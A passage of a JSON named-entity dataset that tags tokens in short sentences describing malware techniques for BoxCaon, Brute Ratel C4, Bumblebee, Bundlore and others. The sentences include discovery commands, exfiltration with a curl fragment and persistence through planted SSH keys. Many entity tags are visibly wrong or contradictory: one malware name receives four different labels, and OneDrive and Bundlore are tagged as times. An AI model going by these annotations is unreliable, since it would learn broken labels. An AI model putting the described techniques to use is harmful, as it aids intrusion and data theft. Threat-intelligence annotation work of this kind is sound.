"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "has", "used", "Windows", "API", "calls", "to", "obtain", "information", "about", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "used", "the", "\"StackStrings\"", "obfuscation", "technique", "to", "hide", "malicious", "functionalities." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "can", "collect", "the", "victim's", "MAC", "address", "by", "using", "the", "<code>GetAdaptersInfo</code>", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "can", "execute", "arbitrary", "commands", "and", "utilize", "the", "\"ComSpec\"", "environment", "variable." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Brave", "Prince", "terminates", "antimalware", "processes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Some", "Brave", "Prince", "variants", "have", "used", "South", "Korea's", "Daum", "email", "service", "to", "exfiltrate", "information,", "and", "later", "variants", "have", "posted", "the", "data", "to", "a", "web", "server", "via", "an", "HTTP", "post", "command." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Area", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O" ] }, { "tokens": [ "Brave", "Prince", "gathers", "file", "and", "directory", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brave", "Prince", "lists", "the", "running", "processes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Brave", "Prince", "gathers", "information", "about", "the", "Registry." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brave", "Prince", "collects", "hard", "drive", "content", "and", "system", "configuration", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brave", "Prince", "gathers", "network", "configuration", "information", "as", "well", "as", "the", "ARP", "cache." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Briba", "downloads", "files", "onto", "infected", "hosts." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Briba", "creates", "run", "key", "Registry", "entries", "pointing", "to", "malicious", "DLLs", "dropped", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Briba", "uses", "rundll32", "within", "Registry", "Run", "Keys", "/", "Startup", "Folder", "entries", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Briba", "installs", "a", "service", "pointing", "to", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "used", "search", "order", "hijacking", "to", "load", "a", "malicious", "payload", "DLL", "as", "a", "dependency", "to", "a", "benign", "application", "packaged", "in", "the", "same", "ISO." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "loaded", "a", "malicious", "DLL", "by", "spoofing", "the", "name", "of", "the", "legitimate", "Version.DLL", "and", "placing", "it", "in", "the", "same", "folder", "as", "the", "digitally-signed", "Microsoft", "binary", "OneDriveUpdater.exe." ], "ner_tags": [ "B-Idus", "B-SecTeam", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "DNS", "over", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "upload", "files", "from", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "deobfuscate", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "B-SecTeam", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "LDAP", "queries,", "`net", "group", "\"Domain", "Admins\"", "/domain`", "and", "`net", "user", "/domain`", "for", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "`net", "group`", "for", "discovery", "on", "targeted", "domains." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "LDAP", "queries", "and", "`nltest", "/domain_trusts`", "for", "domain", "trust", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "call", "and", "dynamically", "resolve", "hashed", "APIs." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "B-Features", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "hide", "memory", "artifacts", "and", "to", "patch", "Event", "Tracing", "for", "Windows", "(ETW)", "and", "the", "Anti", "Malware", "Scan", "Interface", "(AMSI)." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-HackOrg", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "download", "files", "to", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "decode", "Kerberos", "5", "tickets", "and", "convert", "it", "to", "hashcat", "format", "for", "subsequent", "cracking." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "gained", "execution", "through", "users", "opening", "malicious", "documents." ], "ner_tags": [ "B-Idus", "I-Tool", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "used", "Microsoft", "Word", "icons", "to", "hide", "malicious", "LNK", "files." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "B-SamFile", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "used", "a", "payload", "file", "named", "OneDrive.update", "to", "appear", "benign." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "call", "multiple", "Windows", "APIs", "for", "execution,", "to", "share", "memory,", "and", "defense", "evasion." ], "ner_tags": [ "B-SamFile", "I-Tool", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "conduct", "port", "scanning", "against", "targeted", "systems." ], "ner_tags": [ "B-Way", "B-SecTeam", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "use", "TCP", "for", "external", "C2." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "used", "encrypted", "payload", "files", "and", "maintains", "an", "encrypted", "configuration", "structure", "in", "memory." ], "ner_tags": [ "B-Idus", "I-Tool", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "enumerate", "all", "processes", "and", "locate", "specific", "process", "IDs", "(PIDs)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "DNS", "over", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "used", "reflective", "loading", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "use", "RPC", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "has", "the", "ability", "to", "use", "SMB", "to", "pivot", "in", "compromised", "networks." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "take", "screenshots", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "detect", "EDR", "userland", "hooks." ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "create", "Windows", "system", "services", "for", "execution." ], "ner_tags": [ "B-SamFile", "I-Tool", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "call", "`NtDelayExecution`", "to", "pause", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "HTTPS", "and", "HTTPS", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "legitimate", "websites", "for", "external", "C2", "channels", "including", "Slack,", "Discord,", "and", "MS", "Teams." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "cmd.exe", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "WMI", "to", "move", "laterally." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Brute", "Ratel", "C4", "can", "use", "WinRM", "for", "pivoting." ], "ner_tags": [ "B-Way", "B-HackOrg", "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "compress", "data", "stolen", "from", "the", "Registry", "and", "volume", "shadow", "copies", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "asynchronous", "procedure", "call", "(APC)", "injection", "to", "execute", "commands", "received", "from", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "bypass", "UAC", "to", "deploy", "post", "exploitation", "tools", "with", "elevated", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "a", "COM", "object", "to", "execute", "queries", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Bumblebee", "can", "capture", "and", "compress", "stolen", "credentials", "from", "the", "Registry", "and", "volume", "shadow", "copies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "search", "for", "tools", "used", "in", "static", "analysis." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "deobfuscate", "C2", "server", "responses", "and", "unpack", "its", "code", "on", "targeted", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Bumblebee", "loader", "can", "support", "the", "`Dij`", "command", "which", "gives", "it", "the", "ability", "to", "inject", "DLLs", "into", "the", "memory", "of", "other", "processes." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "send", "collected", "data", "in", "JSON", "format", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "backup", "C2", "servers", "if", "the", "primary", "server", "fails." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "uninstall", "its", "loader", "through", "the", "use", "of", "a", "`Sdl`", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Bumblebee", "can", "download", "and", "execute", "additional", "payloads", "including", "through", "the", "use", "of", "a", "`Dex`", "command." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "relied", "upon", "a", "user", "opening", "an", "ISO", "file", "to", "enable", "execution", "of", "malicious", "shortcut", "files", "and", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "relied", "upon", "a", "user", "downloading", "a", "file", "from", "a", "OneDrive", "link", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "named", "component", "DLLs", "\"RapportGP.dll\"", "to", "match", "those", "used", "by", "the", "security", "company", "Trusteer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "B-Org" ] }, { "tokens": [ "Bumblebee", "can", "use", "multiple", "Native", "APIs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Bumblebee", "has", "been", "delivered", "as", "password-protected", "zipped", "ISO", "files", "and", "used", "control-flow-flattening", "to", "obfuscate", "the", "flow", "of", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "`odbcconf.exe`", "to", "run", "DLLs", "on", "targeted", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "identify", "processes", "associated", "with", "analytical", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "inject", "code", "into", "multiple", "processes", "on", "infected", "endpoints." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "check", "the", "Registry", "for", "specific", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "used", "`rundll32`", "for", "execution", "of", "the", "loader", "component." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "achieve", "persistence", "by", "copying", "its", "DLL", "to", "a", "subdirectory", "of", "%APPDATA%", "and", "creating", "a", "Visual", "Basic", "Script", "that", "will", "load", "the", "DLL", "via", "a", "scheduled", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "identify", "specific", "analytical", "tools", "based", "on", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "`LoadLibrary`", "to", "attempt", "to", "execute", "GdiPlus.dll." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Bumblebee", "has", "gained", "execution", "through", "luring", "users", "into", "opening", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "been", "spread", "through", "e-mail", "campaigns", "with", "malicious", "links." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "base64", "encode", "C2", "server", "responses." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "encrypt", "C2", "requests", "and", "responses", "with", "RC4" ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "search", "for", "designated", "file", "paths", "and", "Registry", "keys", "that", "indicate", "a", "virtualized", "environment", "from", "multiple", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "enumerate", "the", "OS", "version", "and", "domain", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "identify", "the", "user", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "set", "a", "hardcoded", "and", "randomized", "sleep", "interval." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "the", "ability", "to", "perform", "anti-virtualization", "checks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "create", "a", "Visual", "Basic", "script", "to", "enable", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "has", "been", "downloaded", "to", "victim's", "machines", "from", "OneDrive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "Bumblebee", "can", "use", "`cmd.exe`", "to", "drop", "and", "run", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bumblebee", "can", "use", "WMI", "to", "gather", "system", "information", "and", "to", "spawn", "processes", "for", "code", "injection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "use", "AppleScript", "to", "inject", "malicious", "JavaScript", "into", "a", "browser." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "install", "malicious", "browser", "extensions", "that", "are", "used", "to", "hijack", "user", "searches." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Bundlore", "has", "used", "<code>openssl</code>", "to", "decrypt", "AES", "encrypted", "payload", "data.", "Bundlore", "has", "also", "used", "base64", "and", "RC4", "with", "a", "hardcoded", "key", "to", "deobfuscate", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "change", "browser", "security", "settings", "to", "enable", "extensions", "to", "be", "installed.", "Bundlore", "uses", "the", "<code>pkill", "cfprefsd</code>", "command", "to", "prevent", "users", "from", "inspecting", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "been", "spread", "through", "malicious", "advertisements", "on", "websites." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "uses", "the", "<code>curl", "-s", "-L", "-o</code>", "command", "to", "exfiltrate", "archived", "data", "to", "a", "URL." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-Way", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "prompts", "the", "user", "for", "their", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "uses", "the", "<code>mktemp</code>", "utility", "to", "make", "unique", "file", "and", "directory", "names", "for", "payloads,", "such", "as", "<code>TMP_DIR=`mktemp", "-d", "-t", "x</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "download", "and", "execute", "new", "versions", "of", "itself." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "execute", "JavaScript", "by", "injecting", "it", "into", "the", "victim's", "browser." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "can", "persist", "via", "a", "LaunchAgent." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Bundlore", "can", "persist", "via", "a", "LaunchDaemon." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Bundlore", "changes", "the", "permissions", "of", "a", "payload", "using", "the", "command", "<code>chmod", "-R", "755</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "attempted", "to", "get", "users", "to", "execute", "a", "malicious", ".app", "file", "that", "looks", "like", "a", "Flash", "Player", "update." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "disguised", "a", "malicious", ".app", "file", "as", "a", "Flash", "Player", "update." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "obfuscated", "data", "with", "base64,", "AES,", "RC4,", "and", "bz2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "used", "the", "<code>ps</code>", "command", "to", "list", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "used", "Python", "scripts", "to", "execute", "payloads." ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "creates", "a", "new", "key", "pair", "with", "<code>ssh-keygen</code>", "and", "drops", "the", "newly", "created", "user", "key", "in", "<code>authorized_keys</code>", "to", "enable", "remote", "login." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "has", "the", "ability", "to", "enumerate", "what", "browser", "is", "being", "used", "as", "well", "as", "version", "information", "for", "Safari." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Bundlore", "will", "enumerate", "the", "macOS", "version", "to", "determine", "which", "follow-on", "behaviors", "to", "execute", "using", "<code>/usr/bin/sw_vers", "-productVersion</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Bundlore", "has", "leveraged", "/bin/sh", "and", "/bin/bash", "to", "execute", "commands", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Time", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bundlore", "uses", "HTTP", "requests", "for", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "CALENDAR", "malware", "communicates", "through", "the", "use", "of", "events", "in", "Google", "Calendar." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CALENDAR", "has", "a", "command", "to", "run", "cmd.exe", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "CARROTBALL", "has", "the", "ability", "to", "use", "FTP", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "CARROTBALL", "has", "the", "ability", "to", "download", "and", "install", "a", "remote", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CARROTBALL", "has", "been", "executed", "through", "users", "being", "lured", "into", "opening", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "CARROTBALL", "has", "used", "a", "custom", "base64", "alphabet", "to", "decode", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "execute", "obfuscated", "commands", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "download", "a", "base64", "encoded", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", 